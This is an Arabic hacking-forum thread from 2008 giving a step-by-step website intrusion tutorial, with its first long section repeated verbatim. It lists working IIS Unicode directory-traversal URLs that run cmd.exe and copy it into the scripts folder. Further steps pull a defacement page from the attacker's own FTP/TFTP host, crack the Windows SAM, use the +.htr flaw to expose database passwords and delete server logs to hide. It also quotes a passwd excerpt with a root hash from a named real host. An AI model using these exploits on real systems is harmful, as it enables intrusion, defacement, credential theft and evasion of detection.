اكبر شرح للاختراق
صفحة 1 من اصل 1
اكبر شرح للاختراق
من طرف Hacker الخميس أغسطس 14, 2008 3:29 am
أساسيات اختراق المواقع :
*******************
1-مقدمة
2- جمع معلومات عن الموقع
3- كشف ثغرات الموقع او أكتشاف ثغرات جديدة
4- كيفية أستغلال ثغرات اليونيكود والثغرات العادية
5- ملف passwd وماهي فائدته
6- كيفية فك تشفير ملف passwd
7- اذا كان ملف passwd مضلل ماذا تفعل
8- فك تشفير ملف passwd بعد دمجه مع ملف shadow
9- كيفية استغلال الباسورد
اولا: مقدمة: اختراق المواقع شيء سهل جدا ولا يحتاج الى مخترعين ولا الى خبراء وانا اعرف ان كثير منكم يعتقد ان اختراق المواقع صعب
ولا يمكن اختراق موقع الا للخبراء اوالهكزر المحترفين وانا اعددت هذا المستند لشرح اساسيات اختراق المواقع والسيرفرات بالتفصيل واود ان انبه للذين يقومون باختراق المواقع ببرامج وانا لا اعرف عن برامج لاختراق المواقع
لاني بحياتي لم اسمع عن اي احد قام باختراق موقع ببرامج اختراق مواقع لان كلها تحزير الباسوردات خرابيط يعني
--------------------------------------------
ثانيا: جمع معلومات عن الموقع(او السيرفر):
ّّّّّّّّجمع االمعلومات عن الموقع تكون بأحد المواقع التي تقدم خدمه جمع المعلومات عن السيرفر مثل هذا االموقع http://www.netcraft.com/ او يمكنك الأستعانة ببرنامج الذي سوف انزله بعد هذا الموضوع مباشره وهو يقوم بجمع معلومات عن السيرفر
فائدة جمع المعلومات عن السيرفر هي لمعرفة الثغرات اللازمة له فمثلا لنظام وندوز ان تي ثغرات اليونكود منتشره فيه واظن انه النظام الوحيد الذي توجد فيه على حد علمي وهي تعتبر اسهل الثغرات وسوف اتكلم عنها في هذا الموضوع من موضوع Sniper_hEx
-------------------------------
ثالثا : كشف ثغرات الموقع او أكتشاف ثغرات جديدة:
كشف ثغرات الموقع لها برامج كثثييرة جدا سوف اقول لكم احسنها واسرعها برنامج عمران عنوان البرنامج من X-Demon-X او يمكنك الأستعانة بأحد برامج كشف الثغرات عد واغلط من البرامج منها
http://www.glocksoft.com/.down/aat4xx.zip واللي عنده برنامج ثاني يحط وصلته
اما اكتشاف الثغرات جديد وهو الأصعب وهو لا يمكن الا للمبرمجين مثل الذين يعرفون لغة cgi ويعرفون اماكن الباسوردات او يمكن اي يكون صدفة مثل ان يضع اسم مجلد في السيرفر مثل WWW.xxxx.COM/almjde/ وبذلك يدخل الى مجلد الموقع من السيرفر ويأتي بملف congif.php
الذي يكون فيه باسورد الموقع في أغلب الأحيان يكون مجلد Admin مؤمن وبذلك يستحيل اخراج ملف congif لا اظنهم اكتشفوا طريقة لفك تأمين مجلد الأدمن الى الان على حد علمي
------------------------------
رابعا: كيف يتم استغلال ثغرات اليونيكود والثغرات العادية:
اولا ثغرات اليونيكود مأخوذ من موضوع سنايبر هيكس
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
sNiper_hEx - sNiper_hEx@Hotmail.Com
<<< Clear Your Mind >>>
1/10/1422هـ - 16/Des/2001م
يحتوى الدرس الاول على ( 13 نقطة ) وهي كما يلي :-
تعريف باليونيكود .
-تاريخ ظهور هذه الثغرة .
-كيفية ايجاد هذه الثغرات .
-كيف يتم استغلال ثغرات اليونكود .
-الاوامر المستخدمة بواسطة ملف CMD .
-طريقة تطبيق هذه الثغرات .
-كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
-طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
-كيفية عمل اكاونت للدخول بواسطة الـFTP .
-طريقة كشف باسورد الادمينستريتور .
-تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
-مسح ملفات اللوق حتى لا يتم التعرف عليك .
-تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .
-تاريخ ظهور هذه الثغرة .
لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .
-كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
-كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
-الاوامر المستخدمة بواسطة ملف CMD .
الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
امر انشاء دليل جديد: http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+md+c:\hEx
امر الغاء دليل: http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+rd+c:\hEx
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات
الامر المستخدم للنسخ:
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe
الامر المستخدم للنقل:
http://www.xxxx.com/msadc/..A¯../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe+c:\
الامر المستخدم للحذف: http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb
الامر المستخدم لتغيير مسمى الملفات: http://www.xxxx.com/msadc/..A¯../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm
الامر المستخدم لرؤية محتويات الملف: http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+type+c:\hEx.txt
الامر المستخدم للكتابة داخل أي ملف:
http://www.xxxx.com/msadc/..A¯../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt
الامر المستخدم لعملية سحب أي ملف:
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:
http://www.xxxx.com/msadc/hEx.mdb
-طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/scripts/..? ../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..A%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..A¯../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..A%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..?%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..?œ../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..?%pc../winnt/system32/cmd.exe?/c+dir +c:\
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
-كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+dir+c:\
فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe
بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.com+>+c:\inetpub\wwwroot\index.htm
-طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd1.exe?c+dir+c:\
- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1-لطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
2-الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
oاولا انشاء صفحة باسم test.shtml
oتكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml
oكتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
oالان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml
oالان سوف تظهر لك الصفحة .
oالان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .
oاذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3-الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4-الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5-البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .
-كيفية عمل اكاونت للدخول بواسطة الـFTP .
1-نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe
2-انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .
/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl
3-الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
4-الان مطلوب ادراج البريد hExRay@Hotmail.Com الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl
5-إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl
6-الان تكرار لحاجة الاعداد
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl
7-يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl
8-لان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl
9-هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
10-لان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open FTP.host.com
- Anonymous
- hEx@Hotmail.Com
- User Anonymous
- hEx@Hotmail.Com
- Get index.html
- Quit
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"
*******************
1-مقدمة
2- جمع معلومات عن الموقع
3- كشف ثغرات الموقع او أكتشاف ثغرات جديدة
4- كيفية أستغلال ثغرات اليونيكود والثغرات العادية
5- ملف passwd وماهي فائدته
6- كيفية فك تشفير ملف passwd
7- اذا كان ملف passwd مضلل ماذا تفعل
8- فك تشفير ملف passwd بعد دمجه مع ملف shadow
9- كيفية استغلال الباسورد
اولا: مقدمة: اختراق المواقع شيء سهل جدا ولا يحتاج الى مخترعين ولا الى خبراء وانا اعرف ان كثير منكم يعتقد ان اختراق المواقع صعب
ولا يمكن اختراق موقع الا للخبراء اوالهكزر المحترفين وانا اعددت هذا المستند لشرح اساسيات اختراق المواقع والسيرفرات بالتفصيل واود ان انبه للذين يقومون باختراق المواقع ببرامج وانا لا اعرف عن برامج لاختراق المواقع
لاني بحياتي لم اسمع عن اي احد قام باختراق موقع ببرامج اختراق مواقع لان كلها تحزير الباسوردات خرابيط يعني
--------------------------------------------
ثانيا: جمع معلومات عن الموقع(او السيرفر):
ّّّّّّّّجمع االمعلومات عن الموقع تكون بأحد المواقع التي تقدم خدمه جمع المعلومات عن السيرفر مثل هذا االموقع http://www.netcraft.com/ او يمكنك الأستعانة ببرنامج الذي سوف انزله بعد هذا الموضوع مباشره وهو يقوم بجمع معلومات عن السيرفر
فائدة جمع المعلومات عن السيرفر هي لمعرفة الثغرات اللازمة له فمثلا لنظام وندوز ان تي ثغرات اليونكود منتشره فيه واظن انه النظام الوحيد الذي توجد فيه على حد علمي وهي تعتبر اسهل الثغرات وسوف اتكلم عنها في هذا الموضوع من موضوع Sniper_hEx
-------------------------------
ثالثا : كشف ثغرات الموقع او أكتشاف ثغرات جديدة:
كشف ثغرات الموقع لها برامج كثثييرة جدا سوف اقول لكم احسنها واسرعها برنامج عمران عنوان البرنامج من X-Demon-X او يمكنك الأستعانة بأحد برامج كشف الثغرات عد واغلط من البرامج منها
http://www.glocksoft.com/.down/aat4xx.zip واللي عنده برنامج ثاني يحط وصلته
اما اكتشاف الثغرات جديد وهو الأصعب وهو لا يمكن الا للمبرمجين مثل الذين يعرفون لغة cgi ويعرفون اماكن الباسوردات او يمكن اي يكون صدفة مثل ان يضع اسم مجلد في السيرفر مثل WWW.xxxx.COM/almjde/ وبذلك يدخل الى مجلد الموقع من السيرفر ويأتي بملف congif.php
الذي يكون فيه باسورد الموقع في أغلب الأحيان يكون مجلد Admin مؤمن وبذلك يستحيل اخراج ملف congif لا اظنهم اكتشفوا طريقة لفك تأمين مجلد الأدمن الى الان على حد علمي
------------------------------
رابعا: كيف يتم استغلال ثغرات اليونيكود والثغرات العادية:
اولا ثغرات اليونيكود مأخوذ من موضوع سنايبر هيكس
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
sNiper_hEx - sNiper_hEx@Hotmail.Com
<<< Clear Your Mind >>>
1/10/1422هـ - 16/Des/2001م
يحتوى الدرس الاول على ( 13 نقطة ) وهي كما يلي :-
تعريف باليونيكود .
-تاريخ ظهور هذه الثغرة .
-كيفية ايجاد هذه الثغرات .
-كيف يتم استغلال ثغرات اليونكود .
-الاوامر المستخدمة بواسطة ملف CMD .
-طريقة تطبيق هذه الثغرات .
-كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
-طريقة نسخ ملف الـ CMD لاتاحة امكانية الكتابة على الملفات .
- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
-كيفية عمل اكاونت للدخول بواسطة الـFTP .
-طريقة كشف باسورد الادمينستريتور .
-تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
-مسح ملفات اللوق حتى لا يتم التعرف عليك .
-تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع IIS4.0 / IIS5.0 والذي ياتي عادة مع NT4 / Win2k .
-تاريخ ظهور هذه الثغرة .
لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .
-كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
-كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
-الاوامر المستخدمة بواسطة ملف CMD .
الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
امر انشاء دليل جديد: http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+md+c:\hEx
امر الغاء دليل: http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+rd+c:\hEx
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات
الامر المستخدم للنسخ:
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe
الامر المستخدم للنقل:
http://www.xxxx.com/msadc/..A¯../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.exe+c:\
الامر المستخدم للحذف: http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb
الامر المستخدم لتغيير مسمى الملفات: http://www.xxxx.com/msadc/..A¯../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm
الامر المستخدم لرؤية محتويات الملف: http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+type+c:\hEx.txt
الامر المستخدم للكتابة داخل أي ملف:
http://www.xxxx.com/msadc/..A¯../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt
الامر المستخدم لعملية سحب أي ملف:
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:
http://www.xxxx.com/msadc/hEx.mdb
-طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/scripts/..? ../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..A%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..A¯../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..A%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..?%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..?œ../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..?%pc../winnt/system32/cmd.exe?/c+dir +c:\
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
-كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?/c+dir+c:\
فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe
بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.com+>+c:\inetpub\wwwroot\index.htm
-طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd1.exe?c+dir+c:\
- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1-لطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
http://www.xxxx.com/msadc/..A¯../..A¯../winnt/system32/cmd.exe?c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
2-الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
oاولا انشاء صفحة باسم test.shtml
oتكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml
oكتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
oالان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml
oالان سوف تظهر لك الصفحة .
oالان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .
oاذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3-الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4-الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5-البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .
-كيفية عمل اكاونت للدخول بواسطة الـFTP .
1-نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe
2-انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .
/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl
3-الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
4-الان مطلوب ادراج البريد hExRay@Hotmail.Com الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl
5-إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl
6-الان تكرار لحاجة الاعداد
/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl
7-يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl
8-لان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl
9-هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
10-لان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open FTP.host.com
- Anonymous
- hEx@Hotmail.Com
- User Anonymous
- hEx@Hotmail.Com
- Get index.html
- Quit
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"
Hacker- عدد المساهمات : 49
تاريخ التسجيل : 11/08/2007
العمر : 34
الموقع : www.v99x.com -
رد: اكبر شرح للاختراق
من طرف Hacker الخميس أغسطس 14, 2008 3:30 am
طريقة كشف باسورد الادمينستريتور .
نحتاج الى وجود برنامجين ( Microsoft Access – L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack كما هو موضح بالشكل التالي:-
-اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL
-اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
http://www.xxxx.com/default.asp+.htr
عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .
-تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
1-قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\
2-قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
tftp.exe وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm اسم الملف بجهازك
\inetpub\wwwroot\ اسم الدليل في السيرفر
index.htm اسم الملف على السيرفر
-مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log
sNiper_hEx
-------------------
هذه عبارة عن اسغلال ثغرات اليونيكود
--DarK_HaCKeR-- عضو مزيون المشاركات: 47 ارسلت بتاريخ20-01-2002
ثانيا : استغلال الثغرات العادية :
الثغرات العادية تكون مثل هذه الثغرة يتم استغلالها عن طريق المتصفح http://www.mit.edu/afs/athena/system/sun4m_54/srvd/etc / هذه الثغرة في نظام ليونكس وفي مجلد etc يوجد ملف passwd المضلل + ملف shadow المشفر
خامسا: ملف passwd وما فائدته:
ملف الباسورد تكون فيه باسورد الموقع ولكنها اما ان تكون مشفرة مثل هذا /
root:SSpbaftOt8rE6:0:1:0000-Admin(0000):/:/bin/athena/tcsh
daemon:NP:1:1:0000-Admin(0000):/:
bin:NP:2:2:0000-Admin(0000):/usr/bin:
sys:NP:3:3:0000-Admin(0000):/:
